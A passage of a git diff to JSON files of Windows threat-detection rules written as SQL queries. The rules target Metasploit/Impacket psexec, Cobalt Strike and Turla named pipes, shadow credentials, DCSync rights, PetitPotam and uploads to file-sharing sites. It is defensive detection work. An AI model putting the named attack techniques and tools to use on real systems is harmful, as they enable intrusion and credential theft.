"7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Linux hostnames composed of 16 characters." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Unknown" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.t1070.006", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "Unknown" + "Unknown. Feedback welcomed." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", - "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "title": "Windows Defender Exclusion Set", + "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "falsepositives": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml" + }, + { + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/rules/rules_windows_sysmon_medium.json b/rules/rules_windows_sysmon_medium.json index 6eb95de..940c059 100644 --- a/rules/rules_windows_sysmon_medium.json +++ b/rules/rules_windows_sysmon_medium.json @@ -1,795 +1,730 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "PAExec Default Named Pipe", + "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "description": "Detects PAExec default named pipe", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PAExec%' ESCAPE '\\')" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_paexec_default_pipe.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Addition of SID History to Active Directory Object", - "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "status": "stable", - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "author": "Thomas Patzke, @atc_project (improvements)", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "status": "test", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.005" + "attack.t1055" ], "falsepositives": [ - "Migration of an account into a new domain" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' 